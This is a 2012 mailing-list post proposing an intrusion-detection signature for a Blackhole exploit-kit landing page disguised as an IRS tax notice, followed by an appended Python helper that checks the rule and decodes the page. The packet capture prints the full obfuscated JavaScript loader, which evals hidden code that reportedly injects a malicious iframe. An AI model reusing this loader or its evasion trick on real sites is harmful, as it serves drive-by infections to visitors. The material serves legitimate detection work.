[Emerging-Sigs] Proposed Signature - Blackhole Tax Landing

Nathan nathan at packetmail.net
Fri Feb 24 09:29:52 EST 2012


On Fri, 24 Feb 2012 08:22:22 -0600 "Nathan" <nathan at packetmail.net> wrote

> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET CURRENT_EVENTS
> Blackhole Tax Landing with JavaScript try catch";
> flow:established,from_server; content"Please wait, till tax confirmation is
> ready."; fast_pattern:only; content"try{"; content:"catch("; sid:x; rev:1;)

Must be a new mailing campaign, this one is firing pretty well.  Might be
valuable to get it out in the tarball quickly.  The above sig is missing the
colon on two of the content matches, sorry.

08:26:23.919723 IP 68.178.235.107.80 > 10.86.192.103.1466: . 1:1381(1380) ack 260 win 6432
E...e. at ./...D..k
V.g.P..[..d.1`.P.. e...HTTP/1.1 200 OK
Date: Fri, 24 Feb 2012 14:26:23 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

b7b
<html>
<title>IRS Internal Revenue Service</title>
<h1>Please wait, till tax confirmation is ready.</h1>
<h3>It will take few minutes.</h3>
<h4>Thank you</h4>
<script>if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new
document(12);}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';f+='Code';}ee='e';e=window.eval;t='y';}h=-2*Math.sin(5*Math.PI/2);n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a19.5a60.5a3.5a3.5a3.5a51.5a50a56a47.5a53.5a49.5a56a19a19.5a28.5a3.5a3.5a61.5a15a49.5a53a56.5a49.5a15a60.5a3.5a3.5a3.5a49a54.5a48.5a57.5a53.5a49.5a54a57a22a58.5a56a51.5a57a49.5a19a16a29a51.5a50a56a47.5a53.5a49.5a15a56.5a56a48.5a29.5a18.5a51a57a57a55a28a22.5a22.5a56.5a59.5a54a49.5a57a58.5a54.5a56a52.5a56.5a22a54a49.5a57a22.5a53.5a47.5a51.5a54a22a55a51a55a30.5a55a47.5a50.5a49.5a29.5a24a49a23a25.5a26.5a49a25a26.5a24a48.5a49a24a23.5a26.5a49.5a24a18.5a15a58.5a51.5a49a57a51a29.5a18.5a23.5a23a18.5a15a51a49.5a51.5a50.5a51a57a29.5a18.5a23.5a23a18.5a15a56.5a57a59.5a53a49.5a29.5a18.5a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a28a51a51.5a49a49a49.5a54a28.5a55a54.5a56.5a51.5a5
08:26:23.919786 IP 68.178.235.107.80 > 10.86.192.103.1466: . 1381:2761(1380) ack 260 win 6432
E...e. at ./...D..k
V.g.P..[....1`.P..
x..7a51.5a54.5a54a28a47.5a48a56.5a54.5a53a57.5a57a49.5a28.5a53a49.5a50a57a28a23a28.5a57a54.5a55a28a23a28.5a18.5a30a29a22.5a51.5a50a56a47.5a53.5a49.5a30a16a19.5a28.5a3.5a3.5a61.5a3.5a3.5a50a57.5a54a48.5a57a51.5a54.5a54a15a51.5a50a56a47.5a53.5a49.5a56a19a19.5a60.5a3.5a3.5a3.5a58a47.5a56a15a50a15a29.5a15a49a54.5a48.5a57.5a53.5a49.5a54a57a22a48.5a56a49.5a47.5a57a49.5a33.5a53a49.5a53.5a49.5a54a57a19a18.5a51.5a50a56a47.5a53.5a49.5a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a56.5a56a48.5a18.5a21a18.5a51a57a57a55a28a22.5a22.5a56.5a59.5a54a49.5a57a58.5a54.5a56a52.5a56.5a22a54a49.5a57a22.5a53.5a47.5a51.5a54a22a55a51a55a30.5a55a47.5a50.5a49.5a29.5a24a49a23a25.5a26.5a49a25a26.5a24a48.5a49a24a23.5a26.5a49.5a24a18.5a19.5a28.5a50a22a56.5a57a59.5a53a49.5a22a58a51.5a56.5a51.5a48a51.5a53a51.5a57a59.5a29.5a18.5a51a51.5a49a49a49.5a54a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a55a54.5a56.5a51.5a57a51.5a54.5a54a29.5a18.5a47.5a48a56.5a54.5a53a57.5a57a49.5a18.5a28.5a50a22a56.5a
 57a59.5a53a49.5a22a53a49.5a50a57a29.5a18.5a23a18.5a28.5a50a22a56.5a57a59.5a53a49.5a22a57a54.5a55a29.5a18.5a23a18.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a58.5a51.5a49a57a51a18.5a21a18.5a23.5a23a18.5a19.5a28.5a50a22a56.5a49.5a57a31.5a57a57a56a51.5a48a57.5a57a49.5a19a18.5a51a49.5a51.5a50.5a51a57a18.5a21a18.5a23.5a23a18.5a19.5a28.5a3.5a3.5a3.5a49a54.5a48.5a5
08:26:23.919792 IP 68.178.235.107.80 > 10.86.192.103.1466: FP 2761:3096(335) ack 260 win 6432
E..we. at ./...D..k
V.g.P..[..,.1`.P..
J...7.5a53.5a49.5a54a57a22a50.5a49.5a57a33.5a53a49.5a53.5a49.5a54a57a56.5a32a59.5a41a47.5a50.5a38a47.5a53.5a49.5a19a18.5a48a54.5a49a59.5a18.5a19.5a44.5a23a45.5a22a47.5a55a55a49.5a54a49a32.5a51a51.5a53a49a19a50a19.5a28.5a3.5a3.5a61.5".split("a");for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f](-h*(1+1*n[j]));}q=ss;e(q);</script>
</html>

0
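Added example, not part of Nathan's post or the ET ruleset: a small Python analysis helper that does two things with a response like the capture above. First, it emulates the proposed rule's three content matches (unanchored substring checks with no distance/within modifiers, so order does not matter; fast_pattern:only only chooses the prefilter string). Second, it replays the landing page's own decoder loop, where h = -2*Math.sin(5*Math.PI/2) evaluates to -2 and every token in the a-separated n string becomes the character with code 2*(1+token). The SAMPLE_RESPONSE is constructed: headers plus a trimmed copy of the page with the n string cut to its first 14 tokens from the capture, which decode to the start of the script body. Function names and the analyse() wrapper are my own.

```python
import math
import re

# The three content matches from the proposed signature, as byte strings.
SIG_CONTENT = (b"Please wait, till tax confirmation is ready.", b"try{", b"catch(")

# Constructed sample response: headers plus a trimmed copy of the landing
# page from the capture. The n="..." string is cut to its first 14 tokens,
# and the decoder loop is kept so the three signature patterns are present.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Apache\r\n"
    b"Content-Type: text/html\r\n"
    b"\r\n"
    b"<html>\n"
    b"<title>IRS Internal Revenue Service</title>\n"
    b"<h1>Please wait, till tax confirmation is ready.</h1>\n"
    b"<script>if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';"
    b"try{new document(12);}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';f+='Code';}"
    b"ee='e';e=window.eval;t='y';}h=-2*Math.sin(5*Math.PI/2);"
    b'n="3.5a3.5a51.5a50a15a19a49a54.5a48.5a57.5a53.5a49.5a54a57".split("a");'
    b"for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f](-h*(1+1*n[j]));}q=ss;e(q);</script>\n"
    b"</html>\n"
)


def signature_matches(response: bytes) -> bool:
    """Emulate the rule's content matches: each pattern is an unanchored
    substring search over the server payload, so all three must be present
    but in any order (no distance/within modifiers in the proposed rule)."""
    return all(pattern in response for pattern in SIG_CONTENT)


def extract_encoded_string(response: bytes) -> str:
    """Pull the n="..." literal out of the script tag; returns '' if absent."""
    m = re.search(rb'n="([^"]*)"\.split\("a"\)', response)
    return m.group(1).decode("ascii") if m else ""


def decode_landing_script(encoded: str) -> str:
    """Replay the page's decoder: h = -2*sin(5*pi/2) = -2, so each token t
    becomes the character with code 2*(1+t). int() mirrors the truncation
    String.fromCharCode applies to a non-integer argument."""
    h = -2 * math.sin(5 * math.pi / 2)
    return "".join(
        chr(int(-h * (1 + float(tok)))) for tok in encoded.split("a") if tok
    )


def analyse(response: bytes) -> dict:
    """Run the signature emulation and the decoder over one captured response."""
    encoded = extract_encoded_string(response)
    return {
        "signature_hit": signature_matches(response),
        "decoded_prefix": decode_landing_script(encoded) if encoded else "",
    }


if __name__ == "__main__":
    result = analyse(SAMPLE_RESPONSE)
    print("signature hit:", result["signature_hit"])
    print("decoded:", repr(result["decoded_prefix"]))
```

Two things worth noting when reading the output. The rule's selectivity comes entirely from the campaign-specific heading string; `try{` and `catch(` appear in a large share of legitimate pages, so they only narrow the hit once the fast pattern has fired, and a change to the page text defeats the rule, which is why the decoded script (the iframe injection logic) is the more durable thing to build follow-on detection around. The decoder only has to be replayed, not reverse-engineered, because the arithmetic and the key constant are carried in the page itself.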
